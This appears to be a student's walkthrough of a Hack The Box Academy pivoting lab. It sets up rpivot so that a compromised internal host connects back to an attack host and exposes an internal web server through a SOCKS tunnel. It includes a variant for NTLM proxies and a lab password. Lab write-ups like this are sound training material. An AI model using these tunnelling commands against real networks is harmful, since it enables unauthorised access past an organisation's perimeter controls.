Skip to content

Web Server Pivoting with Rpivot

Rpivot is a reverse SOCKS proxy tool written in Python for SOCKS tunneling. Rpivot binds a machine inside a corporate network to an external server and exposes the client's local port on the server-side. We will take the scenario below, where we have a web server on our internal network (172.16.5.135), and we want to access that using the rpivot proxy.

tmux setup 

tmux setenv PIVOT_HOST_IP 10.129.147.115
tmux setenv ATTACK_HOST_IP 10.10.15.5

Step 1

Cloning rpivot 

git clone https://github.com/klsecservices/rpivot.git

Step 2

Running server.py from the Attack Host 

python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip $ATTACK_HOST_IP

Step 3

Transfering rpivot to the Target 

scp -r rpivot ubuntu@$PIVOT_HOST_IP:/home/ubuntu/
|<- HTB_@cademy_stdnt!

Connect to Pivot Host 

ssh ubuntu@$PIVOT_HOST_IP
|<- HTB_@cademy_stdnt!

Running client.py from Pivot Target 

python2.7 client.py --server-ip <ATTACK_HOST_IP> --server-port 9999

Step 4

We will configure proxychains to pivot over our local server on 127.0.0.1:9050 on our attack host, which was initially started by the Python server.

Step 5

Browsing to the Target Webserver using Proxychains 

proxychains firefox-esr 172.16.5.135:80

NTLM

Similar to the pivot proxy above, there could be scenarios when we cannot directly pivot to an external server (attack host) on the cloud. Some organizations have HTTP-proxy with NTLM authentication configured with the Domain Controller. In such cases, we can provide an additional NTLM authentication option to rpivot to authenticate via the NTLM proxy by providing a username and password. In these cases, we could use rpivot's client.py in the following way: 

python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>